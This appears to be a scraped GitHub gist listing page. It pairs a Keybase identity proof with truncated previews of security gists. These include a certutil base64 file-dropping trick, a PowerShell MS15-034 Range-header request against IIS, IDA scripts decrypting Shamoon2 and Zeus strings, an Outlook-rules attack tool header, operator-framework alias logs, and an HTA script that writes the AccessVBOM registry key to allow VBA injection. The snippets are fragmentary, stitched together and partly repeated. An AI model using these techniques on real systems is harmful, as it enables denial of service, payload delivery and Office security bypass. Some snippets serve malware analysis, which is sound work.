I hereby claim:
- I am kaicastledine on github.
- I am kcsec (https://keybase.io/kcsec) on keybase.
- I have a public key ASCJYGqbSLo24CpFzGCUtCpDq4hMus71-wEju9tIkcDr9Ao
To claim this, I am signing this object:
echo -----BEGIN CERTIFICATE----- > encoded.txt | |
echo Just Base64 encode your binary data | |
echo TVoAAA== >> encoded.txt | |
echo -----END CERTIFICATE----- >> encoded.txt | |
certutil -decode encoded.txt decoded.bin |
powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()} |
# Sends a CVE-2015-1635 / MS15-034 Request and checks for vulnerability | |
function TestMS15_034($hostname, $port) | |
{ | |
if ($port -eq $null) | |
{ | |
$port = 80 | |
} | |
$tc = New-Object Net.Sockets.TcpClient | |
import idc | |
def decrypt_n_comment(func, func_name): | |
""" | |
Decrypt and comment Shamoon2's strings | |
""" | |
data = {} | |
for xref in XrefsTo(LocByName(func_name)): | |
# init |
def decrypt(func): | |
""" | |
Decryption of zeus strings | |
""" | |
ZBOT_INDEX_MIN = 0x0 | |
ZBOT_INDEX_MAX = 0xe7 | |
data = {} | |
for i in range(ZBOT_INDEX_MIN, ZBOT_INDEX_MAX): | |
#!/usr/bin/env python | |
# Rulz.py | |
# Author: Nick Landers (@monoxgas) - Silent Break Security | |
import os | |
import sys | |
import argparse | |
import re | |
import binascii | |
import codecs |
21:25:59>> aliases | |
[21:25:59] ID: 331 'aliases' started [target: z0.0.0.1] | |
acquiretoken : LOCAL : script _AcquireToken.dss %%cmd_args%% | |
acquiretoken : ANY_REMOTE : script _AcquireToken.dss %%cmd_args%% | |
arparp : LOCAL : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
arparp : ANY_REMOTE : python windows/arparp.py -args " %%cmd_args%% " -project Ops | |
channels : LOCAL : commands %%cmd_args%% | |
channels : ANY_REMOTE : commands %%cmd_args%% | |
checkpsp : LOCAL : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops | |
checkpsp : ANY_REMOTE : python windows/checkpsp.py -args " %%cmd_args%% " -project Ops |
I hereby claim:
To claim this, I am signing this object:
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |
<html> | |
<head> | |
<script> | |
var objExcel = new ActiveXObject("Excel.Application"); | |
objExcel.Visible = false; | |
var WshShell = new ActiveXObject("WScript.Shell"); | |
var Application_Version = objExcel.Version;//Auto-Detect Version | |
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM"; | |
WshShell.RegWrite(strRegPath, 1, "REG_DWORD"); | |
var objWorkbook = objExcel.Workbooks.Add(); |